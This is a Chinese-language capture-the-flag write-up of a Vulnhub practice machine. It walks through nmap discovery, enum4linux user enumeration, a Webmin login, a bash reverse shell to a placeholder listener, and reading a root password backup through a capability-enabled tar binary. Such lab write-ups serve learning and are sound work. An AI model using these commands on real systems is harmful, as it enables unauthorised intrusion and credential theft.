端口扫描

主机发现

开启靶机后

sudo nmap -sn xxx.xxx.xxx.0/24

额外新增加主机的就是要进行渗透测试的机器

Web

目录扫描一下80端口

这个manual目录倒是没什么东西,倒是在根目录发现了这一串注释

CTF常见的brainfuck编码,在线网站解下

https://www.splitbrain.org/services/ook

.2uqPEfj3D<P’a-3

不知道有啥用,回到之前nmap扫到的CVE看看

登录20000端口看一下,需要输入用户名和密码

在端口扫描可以看到有SMB服务(139和445端口),我们可以用enum4linux来列举一下用户

enum4linux -a 192.168.162.140

发现一个叫cyber的用户

那我们用这个用户名和上面得到的密码来登录

Getshell

找了一圈没找到上传文件的地方,结果发现有可以直接调用终端的地方

即便如此还是习惯用反弹shell,kali中开启监听,然后在web端的终端中执行

/bin/bash -i >& /dev/tcp/attack/port 0>&1

成功接收

提权

发现没有sudo,也没有计划任务,但是发现有cap文件

getcap -r / 2>/dev/null

用于递归寻找cap文件

找到一个”tar”,本来想用SUID那种搞个检查点的方式直接提权,发现行不通。WP在/var/backups目录找到了一个oldpass备份,那我们可以用tar来读取文件

./tar -cvf pass /var/backups/.old_pass.bak
./tar -xvf pass
cat pass

可以理解为用root身份将这个密码打包再解压,就可以查看了?

密码应该是这玩意Ts&4&YurgtRX(=~h

成功提权

find / -name "*pass*" | sort | less 2>/dev/null

其实用这个命令也可以查找相关密码文件,应该在拿到shell的第一时间查看一下敏感文件的

碎碎念

第一此在本地用虚拟机开了个靶机打,打的是vulnhub上的机器,感觉也不错。SMB服务好像一般只是用来提供信息用的。然后这个Webmin的10000和20000端口好像是第二次见了(?)敏感文件要多找找,不能盲目想着用一些直接提权的方式。tar这个提权方式见了好几次了,感觉还蛮重要的